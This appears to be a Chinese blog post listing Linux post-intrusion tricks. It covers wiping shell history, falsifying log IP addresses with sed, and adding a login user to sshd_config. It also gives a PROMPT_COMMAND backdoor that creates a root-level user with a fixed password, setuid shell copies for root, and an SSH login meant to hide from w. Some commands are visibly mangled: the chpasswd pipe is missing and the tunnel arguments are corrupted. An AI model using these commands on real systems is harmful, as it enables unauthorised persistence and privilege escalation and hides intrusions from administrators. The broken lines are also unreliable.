<strong>1. 登录ssh之后不记录history</strong><br />

unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG
export HISTFILE=/dev/null
export HISTSIZE=0
export HISTFILESIZE=0

DDrk中就用到了一面的一条:<br />

unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE

&nbsp;



<strong>2. sed增加登陆信息</strong><br />

替换登录日志
sed -s ‘s/202.101.172.35/192.168.1.1/g’ access_log access.log security
添加ssh限制登录的用户
sed -i ‘s/AllowUsers fuck root oracle/AllowUsers fuck root oracle rqcuser/g’ sshd_config
不过这个添加之后要强制重启sshd服务才可以生效
lsof -i:22 查找sshd的进程ID
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
sshd 18662 root 11u IPv6 27925867 TCP *:ssh (LISTEN)
sshd 31793 sshd 12u IPv6 34742994 TCP 192.168.1.2:ssh->192.168.1.5:49080 (ESTABLISHED)
然后
kill -SIGHUP 18662

&nbsp;



<strong>3.linux的BASH提权</strong><br />

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 hack &>/dev/null && echo hack:123456
/usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

&nbsp;



<strong>4.ssh tunnel端口转发</strong><br />

ssh -C -f -N -g -L listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -R listen_portST_HostST_port user@Tunnel_Host
ssh -C -f -N -g -D listen_port user@Tunnel_Host-f

&nbsp;



<strong>5.本地rootshell</strong><br />

bash和tcsh是行不通的,其他的ash bsh zsh ksh均可。具体操作比较简单,大概说一下cp /bin/ksh . ; chown
root.root ksh; chmod 4755 ksh,然后执行ksh就可以获得root权限了;这一招虽然看似低级,但某些时候还是很
有用的。所以一般情况下把多余的shell删除可以在一定程度上 减少黑客的入侵。

<strong>6.让w查不到</strong><strong>登录信息</strong> <br />

用rootkit我就不废话了,这里有个小窍门,即使是普通用户登录管理员也不能看见:
ssh -T user@202.101.172.35 /bin/bash -i
ssh -T 202.101.172.35 -p 8088 -l root /bin/bash -i
这里也不便设置别人的IP,就搞个浙江电信的DNS地址吧。
该命令其实是把远程的bash映射到本地。在ps命令里还是能看到下面的进程的
_ sshd: root@notty
_ /bin/bash -i